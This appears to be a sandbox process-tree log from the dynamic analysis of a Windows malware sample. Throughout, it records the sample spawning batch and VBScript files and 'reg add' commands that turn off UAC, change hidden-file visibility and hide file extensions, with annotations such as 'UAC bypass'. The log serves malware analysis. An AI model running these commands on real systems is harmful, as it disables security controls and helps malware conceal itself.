reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:4936

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HGwwkIMg.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:4364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NsUsQQEs.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:2656
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:4176
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:3112
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:2896
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:3880

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:2704

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Modifies registry key
PID:4316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pAIMUgsc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:3588
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:3880
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1560
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:60
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eKYYEYEY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
      C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
      4⤵
      PID:3792
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:2072

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EWMIokEI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:2032
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1344
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:684
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:4092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yMMcMcYY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
      4⤵
      PID:3736
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:3348
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:528
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RUEYcoQg.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
        5⤵
        
        PID:364
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:4232
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:3976
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        
        PID:1400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
        5⤵
        
        PID:1612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
      4⤵
      PID:4216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:3628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:3576
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:2620

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:1864

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\myUEcggQ.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:4324

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2104

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:1272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KsMwUUgI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JWAYMAoQ.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:2896
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:3604
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:4776
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:4944

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:4936

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:4856

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2764

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\umIQYsEY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:752
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:3780
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:792

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:5108
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  PID:1332

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:1188
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:4860

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Modifies registry key
PID:4084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vyIgAUoU.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:3844
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:3064
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:4872
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:4372
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:1036
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3860

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NkowwgME.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WEgIMYoY.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:3308
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    PID:4112
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:3576
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:4936
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:5060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\awIUAUEc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:2160

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2104

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:1768

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2556
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:4984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mGsQQEgc.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1068

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:4300

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:4092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dEEYQwYI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:4176

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2940
- C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
  C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
  2⤵
  - UAC bypass
  - Checks whether UAC is enabled
  - Suspicious behavior: EnumeratesProcesses
  - System policy modification
  PID:3880

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:1216

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:1280

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:4816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BocMQMoU.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:4336

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:4364
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:4372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:1188

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CeookIQo.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  PID:3588
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - Modifies registry key
  PID:2808
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:440
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:4232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  PID:3132

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wuocMgoo.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:2120

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:972

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1528
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  - UAC bypass
  - Checks whether UAC is enabled
  - System policy modification
  PID:972
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1552

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:1308
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2856

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:4380

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:4200

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:3780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BIMEUAsE.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
  2⤵
  - UAC bypass
  - Checks whether UAC is enabled
  - System policy modification
  PID:2808
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:4864
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:808
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2856
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QAAMgcAI.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4816
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    PID:2220
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5088

C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe
C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a
1⤵
PID:2392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:3448

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oesYgkEg.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:3736

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- UAC bypass
PID:2400

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:3924

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a"
1⤵
PID:1236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AyUAEwcs.bat" "C:\Users\Admin\AppData\Local\Temp\2288274507c221f12776ff15b93d303a.exe""
1⤵
PID:1484

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1696
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:4092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:3480

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4872

C:\Windows\SysWOW64\cmd.exe
